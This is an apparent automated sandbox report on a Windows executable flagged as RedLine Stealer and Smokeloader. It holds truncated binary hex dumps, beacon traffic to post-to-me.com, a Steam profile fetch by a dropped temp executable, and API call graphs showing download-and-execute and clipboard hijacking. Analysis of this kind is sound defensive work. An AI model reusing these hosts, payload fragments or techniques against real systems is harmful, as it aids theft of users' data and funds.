                                                                                                                                                                                                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ec be f9 b4 a8 df 97 e7 a8 df 97 e7 a8 df 97 e7 b6 8d 13 e7 89 df 97 e7 b6 8d 02 e7 bc df 97 e7 b6 8d 14 e7 c4 df 97 e7 8f 19 ec e7 ab df 97 e7 a8 df 96 e7 d9 df 97 e7 b6 8d 1d e7 a9 df 97 e7 b6 8d 03 e7 a9 df 97 e7 b6 8d 06 e7 a9 df 97 e7 52 69 63 68 a8 df 97 e7 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 f9 fd 95 66 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 36 04 00 00 70 08 00 00 00 00 00 b7 14 00 00 00 10 00 00 00 50 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 f0 0c 00 00 04 00 00 02 17 07 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$RichPELf6pP@i(iP.text46 `.rdataV"P$:@@.data|^@.nosuSHt@.muwavZ`@.roxahp@@.rsrcij@@
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.739381075 CET224INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3b 0d 04 80 44 00 75 02 f3 c3 e9 b2 04 00 00 8b ff 55 8b ec 51 83 65 fc 00 56 8d 45 fc 50 ff 75 0c ff 75 08 e8 29 06 00 00 8b
                                                                                                                                                                                                                                                Data Ascii: ;DuUQeVEPuu)u9EttM^USVuF3u@t9FW>+~,WPVYP;uFyFN _Ff^[]
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.739406109 CET1236INData Raw: ff 55 8b ec 56 8b 75 08 85 f6 75 09 56 e8 35 00 00 00 59 eb 2f 56 e8 7c ff ff ff 59 85 c0 74 05 83 c8 ff eb 1f f7 46 0c 00 40 00 00 74 14 56 e8 93 0e 00 00 50 e8 bf 0e 00 00 59 f7 d8 59 1b c0 eb 02 33 c0 5e 5d c3 6a 14 68 d0 65 44 00 e8 ed 12 00
                                                                                                                                                                                                                                                Data Ascii: UVuuV5Y/V|YtF@tVPYY3^]jheD3}}jY}3u;5JJ98t^@tVPVYY3BUJHt/9UuPJYtE9}utP/YuE}F3uJ4V
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.739418030 CET1236INData Raw: 00 00 59 6a 00 ff 15 9c 50 44 00 68 c8 51 44 00 ff 15 98 50 44 00 83 3d e0 94 44 00 00 75 08 6a 01 e8 1f 36 00 00 59 68 09 04 00 c0 ff 15 94 50 44 00 50 ff 15 90 50 44 00 c9 c3 8b ff 55 8b ec 8b 45 08 33 c9 3b 04 cd 10 80 44 00 74 13 41 83 f9 2d
                                                                                                                                                                                                                                                Data Ascii: YjPDhQDPD=Duj6YhPDPPDUE3;DtA-rHwjX]D]DjY;#]1uxD1u|DUVMQY0^]jh`fDM3;v.jX3;E@u
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.739428997 CET448INData Raw: 33 c9 66 83 fe 0a 0f 94 c1 43 43 83 85 44 e5 ff ff 02 89 b5 40 e5 ff ff 89 8d 20 e5 ff ff 3c 01 74 04 3c 02 75 52 ff b5 40 e5 ff ff e8 bd 3c 00 00 59 66 3b 85 40 e5 ff ff 0f 85 68 03 00 00 83 85 38 e5 ff ff 02 83 bd 20 e5 ff ff 00 74 29 6a 0d 58
                                                                                                                                                                                                                                                Data Ascii: 3fCCD@ <t<uR@<Yf;@h8 t)jXP@<Yf;@;80E9D'8T4D83@4@<9M (<D+4
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.739440918 CET1236INData Raw: 2b 8d 34 e5 ff ff 8d 85 48 e5 ff ff 3b 4d 10 73 46 8b 95 44 e5 ff ff 83 85 44 e5 ff ff 02 0f b7 12 41 41 66 83 fa 0a 75 16 83 85 30 e5 ff ff 02 6a 0d 5b 66 89 18 40 40 83 85 3c e5 ff ff 02 83 85 3c e5 ff ff 02 66 89 10 40 40 81 bd 3c e5 ff ff fe
                                                                                                                                                                                                                                                Data Ascii: +4H;MsFDDAAfu0j[f@@<<f@@<rH+j,PSHP4PDb,8;ZD+4;E?@9M|D<+4jH^;Ms<DDfu
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.739453077 CET1236INData Raw: 7e 04 01 74 0d 57 ff d3 57 e8 fc 3c 00 00 83 26 00 59 83 c6 08 81 fe a0 82 44 00 7c dc be 80 81 44 00 5f 8b 06 85 c0 74 09 83 7e 04 01 75 03 50 ff d3 83 c6 08 81 fe a0 82 44 00 7c e6 5e 5b c3 8b ff 55 8b ec 8b 45 08 ff 34 c5 80 81 44 00 ff 15 c4
                                                                                                                                                                                                                                                Data Ascii: ~tWW<&YD|D_t~uPD|^[UE4DPD]jhfD3G}39DujMhYYu4D9tnj<Y;ue3QjYY]9u,hW;YYuW*<Y/]>
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.739463091 CET448INData Raw: 49 3b 00 00 ba fe ff ff ff 39 53 0c 0f 84 52 ff ff ff 68 04 80 44 00 57 8b cb e8 61 3b 00 00 e9 1c ff ff ff 8b ff 55 8b ec 56 8b 75 08 56 e8 84 f9 ff ff 50 e8 8e 33 00 00 59 59 85 c0 74 7c e8 35 fc ff ff 83 c0 20 3b f0 75 04 33 c0 eb 0f e8 25 fc
                                                                                                                                                                                                                                                Data Ascii: I;9SRhDWa;UVuVP3YYt|5 ;u3%@;u`3@DFuNSW<D?u S>8YuFjFXFF?~>^^N3_@[3^]U}t'VuFtVff&fY^]
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.739474058 CET1236INData Raw: 0c e8 b5 ff ff ff 83 3e ff 74 06 83 7d 0c 00 7f e7 5e 5d c3 8b ff 55 8b ec f6 47 0c 40 53 56 8b f0 8b d9 74 32 83 7f 08 00 75 2c 8b 45 08 01 06 eb 2b 8a 03 ff 4d 08 8b cf e8 7d ff ff ff 43 83 3e ff 75 13 e8 38 ee ff ff 83 38 2a 75 0f 8b cf b0 3f
                                                                                                                                                                                                                                                Data Ascii: >t}^]UG@SVt2u,E+M}C>u88*u?d}^[]UxD3ES]Vu3W}ulu53PPPPPMt
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.739485979 CET1116INData Raw: ff ff 00 08 00 00 e9 89 00 00 00 f7 85 f0 fd ff ff 30 08 00 00 75 0a 81 8d f0 fd ff ff 00 08 00 00 8b 8d e8 fd ff ff 83 f9 ff 75 05 b9 ff ff ff 7f 83 c7 04 f7 85 f0 fd ff ff 10 08 00 00 89 bd dc fd ff ff 8b 7f fc 89 bd e4 fd ff ff 0f 84 b1 04 00
                                                                                                                                                                                                                                                Data Ascii: 0uu;u$DXHHty+'HHt0GPhPPCtG
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.744415998 CET1236INData Raw: 85 e8 fd ff ff 8b c7 0b c3 75 06 21 85 d0 fd ff ff 8d 75 f3 8b 85 e8 fd ff ff ff 8d e8 fd ff ff 85 c0 7f 06 8b c7 0b c3 74 2d 8b 85 e0 fd ff ff 99 52 50 53 57 e8 6e 3f 00 00 83 c1 30 83 f9 39 89 9d a0 fd ff ff 8b f8 8b da 7e 06 03 8d b8 fd ff ff
                                                                                                                                                                                                                                                Data Ascii: u!ut-RPSWn?09~NE+Ftat90tV0@>If90t@@;u+(;u DI8t@;u+\@t2t


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                0192.168.2.549704172.67.179.207443768C:\Users\user\Desktop\L7GNkeVm5e.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2025-01-12 16:52:01 UTC90OUTGET /track_prt.php?sub=0&cc=DE HTTP/1.1
                                                                                                                                                                                                                                                User-Agent: ShareScreen
                                                                                                                                                                                                                                                Host: post-to-me.com
                                                                                                                                                                                                                                                2025-01-12 16:52:01 UTC806INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Sun, 12 Jan 2025 16:52:01 GMT
                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                X-Powered-By: PHP/5.4.16
                                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2B%2BQcjqmklOiyaXbFCpH%2FcljOGRaQDQYcvE9byTChPCkl26YsKxLGKYFxQ4lnmkwCAVUcloTO4OWxJk%2Fkc%2BFsJNG3tD2hidUJse8KZVnvV1Bh3RZ6nEzwIwL%2FmdTCl2ce4A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 900ea79678241861-EWR
                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1505&min_rtt=1501&rtt_var=571&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2834&recv_bytes=728&delivery_rate=1903520&cwnd=188&unsent_bytes=0&cid=266263e74a1d6161&ts=407&x=0"
                                                                                                                                                                                                                                                2025-01-12 16:52:01 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 2ok
                                                                                                                                                                                                                                                2025-01-12 16:52:01 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                1192.168.2.549706104.102.49.254443412C:\Users\user\AppData\Local\Temp\EB86.tmp.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2025-01-12 16:52:06 UTC219OUTGET /profiles/76561199724331900 HTTP/1.1
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                Host: steamcommunity.com
                                                                                                                                                                                                                                                2025-01-12 16:52:06 UTC1905INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                                                                                                                                                                                Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Date: Sun, 12 Jan 2025 16:52:06 GMT
                                                                                                                                                                                                                                                Content-Length: 25665
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Set-Cookie: sessionid=cbc3a60c9f2906ff09a75258; Path=/; Secure; SameSite=None
                                                                                                                                                                                                                                                Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                                                2025-01-12 16:52:06 UTC14479INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e
                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
                                                                                                                                                                                                                                                2025-01-12 16:52:07 UTC11186INData Raw: 3f 6c 3d 6b 6f 72 65 61 6e 61 22 20 6f 6e 63 6c 69 63 6b 3d 22 43 68 61 6e 67 65 4c 61 6e 67 75 61 67 65 28 20 27 6b 6f 72 65 61 6e 61 27 20 29 3b 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 3e ed 95 9c ea b5 ad ec 96 b4 20 28 4b 6f 72 65 61 6e 29 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 70 6f 70 75 70 5f 6d 65 6e 75 5f 69 74 65 6d 20 74 69 67 68 74 22 20 68 72 65 66 3d 22 3f 6c 3d 74 68 61 69 22 20 6f 6e 63 6c 69 63 6b 3d 22 43 68 61 6e 67 65 4c 61 6e 67 75 61 67 65 28 20 27 74 68 61 69 27 20 29 3b 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 3e e0 b9 84 e0 b8 97 e0 b8 a2 20 28 54 68 61 69 29 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09
                                                                                                                                                                                                                                                Data Ascii: ?l=koreana" onclick="ChangeLanguage( 'koreana' ); return false;"> (Korean)</a><a class="popup_menu_item tight" href="?l=thai" onclick="ChangeLanguage( 'thai' ); return false;"> (Thai)</a>


                                                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                                                Click to dive into process behavior distribution

                                                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                                                Target ID:0
                                                                                                                                                                                                                                                Start time:11:51:57
                                                                                                                                                                                                                                                Start date:12/01/2025
                                                                                                                                                                                                                                                Path:C:\Users\user\Desktop\L7GNkeVm5e.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                Commandline:"C:\Users\user\Desktop\L7GNkeVm5e.exe"
                                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                                File size:467'968 bytes
                                                                                                                                                                                                                                                MD5 hash:F7DB525DD98EE5FBDC9C11D59B93985B
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                                • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.4539762016.0000000000629000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                                Target ID:2
                                                                                                                                                                                                                                                Start time:11:52:02
                                                                                                                                                                                                                                                Start date:12/01/2025
                                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\EB86.tmp.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\EB86.tmp.exe"
                                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                                File size:403'968 bytes
                                                                                                                                                                                                                                                MD5 hash:08494E6A1E788EA3259955A4524FDFEC
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                                • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000002.00000002.2358816622.0000000000602000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000002.00000002.2359118882.0000000002160000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                                • Detection: 50%, ReversingLabs
                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                Target ID:5
                                                                                                                                                                                                                                                Start time:11:52:06
                                                                                                                                                                                                                                                Start date:12/01/2025
                                                                                                                                                                                                                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 412 -s 884
                                                                                                                                                                                                                                                Imagebase:0xd90000
                                                                                                                                                                                                                                                File size:483'680 bytes
                                                                                                                                                                                                                                                MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                Reset < >

                                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                                  Execution Coverage:2.4%
                                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:3.7%
                                                                                                                                                                                                                                                  Signature Coverage:5.7%
                                                                                                                                                                                                                                                  Total number of Nodes:761
                                                                                                                                                                                                                                                  Total number of Limit Nodes:21
                                                                                                                                                                                                                                                  execution_graph 64969 402ba3 RegCreateKeyExW 64970 402bd1 RegSetValueExW 64969->64970 64971 402be5 64969->64971 64970->64971 64972 402bf3 64971->64972 64973 402bea RegCloseKey 64971->64973 64973->64972 64974 404b84 64975 404b90 Concurrency::details::SchedulerProxy::DestroyExecutionResource 64974->64975 64980 40fb02 64975->64980 64979 404bb0 Concurrency::details::SchedulerProxy::DestroyExecutionResource 64983 40fb07 64980->64983 64982 404b99 64988 4051c6 64982->64988 64983->64982 64985 40fb23 Concurrency::SchedulerPolicy::SchedulerPolicy 64983->64985 65004 42ad6e 64983->65004 65011 42f440 7 API calls 2 library calls 64983->65011 65012 4285fd RaiseException 64985->65012 64987 4103bc 64989 4051d2 Concurrency::details::SchedulerProxy::DestroyExecutionResource __Cnd_init 64988->64989 64992 4051ea __Mtx_init 64989->64992 65023 40ce28 28 API calls std::_Throw_Cpp_error 64989->65023 64991 405211 65015 4010ea 64991->65015 64992->64991 65024 40ce28 28 API calls std::_Throw_Cpp_error 64992->65024 64998 405260 65002 405275 Concurrency::details::SchedulerProxy::DestroyExecutionResource 64998->65002 65026 401128 30 API calls 2 library calls 64998->65026 65027 401109 65002->65027 65003 40529a Concurrency::details::SchedulerProxy::DestroyExecutionResource 65003->64979 65009 433697 std::_Locinfo::_Locinfo_ctor 65004->65009 65005 4336d5 65014 42eab9 20 API calls _Atexit 65005->65014 65007 4336c0 RtlAllocateHeap 65008 4336d3 65007->65008 65007->65009 65008->64983 65009->65005 65009->65007 65013 42f440 7 API calls 2 library calls 65009->65013 65011->64983 65012->64987 65013->65009 65014->65008 65031 40d309 65015->65031 65018 401103 65020 40cee9 65018->65020 65063 42e104 65020->65063 65023->64992 65024->64991 65025 40ce28 28 API calls std::_Throw_Cpp_error 65025->64998 65026->64998 65028 401115 __Mtx_unlock 65027->65028 65029 401122 65028->65029 65395 40ce28 28 API calls std::_Throw_Cpp_error 65028->65395 65029->65003 65035 40d063 65031->65035 65034 40ce28 28 API calls std::_Throw_Cpp_error 65034->65018 65036 40d0b9 65035->65036 65037 40d08b GetCurrentThreadId 65035->65037 65038 40d0e3 65036->65038 65039 40d0bd GetCurrentThreadId 65036->65039 65040 40d096 GetCurrentThreadId 65037->65040 65049 40d0b1 65037->65049 65041 40d17c GetCurrentThreadId 65038->65041 65045 40d103 65038->65045 65043 40d0cc 65039->65043 65040->65049 65041->65043 65042 40d1d3 GetCurrentThreadId 65042->65049 65043->65042 65043->65049 65060 40e925 GetSystemTimeAsFileTime __aulldvrm __Xtime_get_ticks 65045->65060 65046 4010f6 65046->65018 65046->65034 65053 40f8c5 65049->65053 65050 40d13b GetCurrentThreadId 65050->65043 65051 40d10e __Xtime_diff_to_millis2 65050->65051 65051->65043 65051->65049 65051->65050 65061 40e925 GetSystemTimeAsFileTime __aulldvrm __Xtime_get_ticks 65051->65061 65054 40f8d0 IsProcessorFeaturePresent 65053->65054 65055 40f8ce 65053->65055 65057 40f943 65054->65057 65055->65046 65062 40f907 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 65057->65062 65059 40fa26 65059->65046 65060->65051 65061->65051 65062->65059 65064 42e111 65063->65064 65065 42e125 65063->65065 65086 42eab9 20 API calls _Atexit 65064->65086 65077 42e0bb 65065->65077 65069 42e116 65087 42a58d 26 API calls _Deallocate 65069->65087 65071 42e13a CreateThread 65073 42e165 65071->65073 65074 42e159 GetLastError 65071->65074 65115 42dfb0 65071->65115 65072 40524d 65072->64998 65072->65025 65089 42e02d 65073->65089 65088 42ea83 20 API calls 2 library calls 65074->65088 65097 434d1a 65077->65097 65081 42e0d4 65082 42e0f3 65081->65082 65083 42e0db GetModuleHandleExW 65081->65083 65084 42e02d __Thrd_start 22 API calls 65082->65084 65083->65082 65085 42e0fd 65084->65085 65085->65071 65085->65073 65086->65069 65087->65072 65088->65073 65090 42e03a 65089->65090 65091 42e05e 65089->65091 65092 42e040 CloseHandle 65090->65092 65093 42e049 65090->65093 65091->65072 65092->65093 65094 42e058 65093->65094 65095 42e04f FreeLibrary 65093->65095 65096 43345a _free 20 API calls 65094->65096 65095->65094 65096->65091 65098 434d27 65097->65098 65099 434d67 65098->65099 65100 434d52 HeapAlloc 65098->65100 65103 434d3b std::_Locinfo::_Locinfo_ctor 65098->65103 65113 42eab9 20 API calls _Atexit 65099->65113 65101 434d65 65100->65101 65100->65103 65104 42e0cb 65101->65104 65103->65099 65103->65100 65112 42f440 7 API calls 2 library calls 65103->65112 65106 43345a 65104->65106 65107 433465 HeapFree 65106->65107 65111 43348e __dosmaperr 65106->65111 65108 43347a 65107->65108 65107->65111 65114 42eab9 20 API calls _Atexit 65108->65114 65110 433480 GetLastError 65110->65111 65111->65081 65112->65103 65113->65104 65114->65110 65116 42dfbc _Atexit 65115->65116 65117 42dfc3 GetLastError ExitThread 65116->65117 65118 42dfd0 65116->65118 65131 431eca GetLastError 65118->65131 65120 42dfd5 65151 435561 65120->65151 65124 42dfeb 65158 401169 65124->65158 65132 431ee0 65131->65132 65133 431ee6 65131->65133 65166 435101 11 API calls 2 library calls 65132->65166 65134 434d1a _Atexit 20 API calls 65133->65134 65138 431f35 SetLastError 65133->65138 65136 431ef8 65134->65136 65137 431f00 65136->65137 65167 435157 11 API calls 2 library calls 65136->65167 65140 43345a _free 20 API calls 65137->65140 65138->65120 65142 431f06 65140->65142 65141 431f15 65141->65137 65143 431f1c 65141->65143 65144 431f41 SetLastError 65142->65144 65168 431d3c 20 API calls _Atexit 65143->65168 65169 42df6d 167 API calls 2 library calls 65144->65169 65147 431f27 65149 43345a _free 20 API calls 65147->65149 65148 431f4d 65150 431f2e 65149->65150 65150->65138 65150->65144 65152 435586 65151->65152 65153 43557c 65151->65153 65170 434e83 5 API calls 2 library calls 65152->65170 65155 40f8c5 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 65153->65155 65156 42dfe0 65155->65156 65156->65124 65165 435494 10 API calls 2 library calls 65156->65165 65157 43559d 65157->65153 65171 4057f6 65158->65171 65184 40155a Sleep 65158->65184 65159 401173 65162 42e189 65159->65162 65363 42e064 65162->65363 65164 42e196 65165->65124 65166->65133 65167->65141 65168->65147 65169->65148 65170->65157 65172 405802 Concurrency::details::SchedulerProxy::DestroyExecutionResource 65171->65172 65173 4010ea std::_Cnd_initX 35 API calls 65172->65173 65174 405817 __Cnd_signal 65173->65174 65175 40582f 65174->65175 65230 40ce28 28 API calls std::_Throw_Cpp_error 65174->65230 65176 401109 std::_Cnd_initX 28 API calls 65175->65176 65178 405838 65176->65178 65186 4029ea InternetOpenW 65178->65186 65202 4016df 65178->65202 65181 40583f Concurrency::details::SchedulerProxy::DestroyExecutionResource 65181->65159 65185 4016d5 65184->65185 65187 402b92 65186->65187 65188 402a1d InternetOpenUrlW 65186->65188 65191 40f8c5 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 65187->65191 65188->65187 65189 402a33 GetTempPathW GetTempFileNameW 65188->65189 65231 42a87e 65189->65231 65192 402ba1 65191->65192 65223 40e761 65192->65223 65194 402b81 InternetCloseHandle InternetCloseHandle 65194->65187 65195 402a9e Concurrency::details::GlobalNode::Initialize 65196 402ab6 InternetReadFile WriteFile 65195->65196 65197 402af6 CloseHandle 65195->65197 65196->65195 65233 402956 65197->65233 65200 402b21 ShellExecuteExW 65200->65194 65201 402b68 WaitForSingleObject CloseHandle 65200->65201 65201->65194 65341 40fddc 65202->65341 65204 4016eb Sleep 65342 40cc06 65204->65342 65207 40cc06 28 API calls 65208 401711 65207->65208 65209 40171b OpenClipboard 65208->65209 65210 401943 Sleep 65209->65210 65211 40172b GetClipboardData 65209->65211 65210->65209 65212 40173b GlobalLock 65211->65212 65213 40193d CloseClipboard 65211->65213 65212->65213 65215 401748 _strlen 65212->65215 65213->65210 65214 40cbbd 28 API calls std::system_error::system_error 65214->65215 65215->65213 65215->65214 65216 40cc06 28 API calls 65215->65216 65218 4018d2 EmptyClipboard GlobalAlloc 65215->65218 65346 402e5c 167 API calls 2 library calls 65215->65346 65348 40ca9c 26 API calls _Deallocate 65215->65348 65216->65215 65218->65215 65219 4018eb GlobalLock 65218->65219 65347 426980 65219->65347 65222 401905 GlobalUnlock SetClipboardData GlobalFree 65222->65215 65354 40dee0 65223->65354 65228 40e806 65228->65181 65229 40e778 __Cnd_do_broadcast_at_thread_exit __Mtx_unlock __Cnd_broadcast 65361 40deec LeaveCriticalSection std::_Lockit::~_Lockit 65229->65361 65230->65175 65232 402a6c CreateFileW 65231->65232 65232->65194 65232->65195 65234 402981 _wcslen Concurrency::details::GlobalNode::Initialize 65233->65234 65243 42b444 65234->65243 65238 4029ae 65265 404329 65238->65265 65241 40f8c5 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 65242 4029e8 65241->65242 65242->65194 65242->65200 65269 42b0f6 65243->65269 65246 402819 65247 402828 Concurrency::details::SchedulerProxy::DestroyExecutionResource 65246->65247 65295 4032d3 65247->65295 65249 40283c 65311 403b81 65249->65311 65251 402850 65252 402862 65251->65252 65253 40287e 65251->65253 65338 403290 167 API calls 65252->65338 65317 403108 65253->65317 65256 40288b 65320 403c16 65256->65320 65258 40289d 65330 403cb8 65258->65330 65260 402875 std::ios_base::_Ios_base_dtor Concurrency::details::SchedulerProxy::DestroyExecutionResource 65260->65238 65261 4028ba 65262 404329 26 API calls 65261->65262 65263 4028d9 65262->65263 65339 403290 167 API calls 65263->65339 65266 404331 65265->65266 65268 4029da 65265->65268 65340 40cc8c 26 API calls 2 library calls 65266->65340 65268->65241 65270 42b123 65269->65270 65271 42b132 65270->65271 65272 42b14a 65270->65272 65284 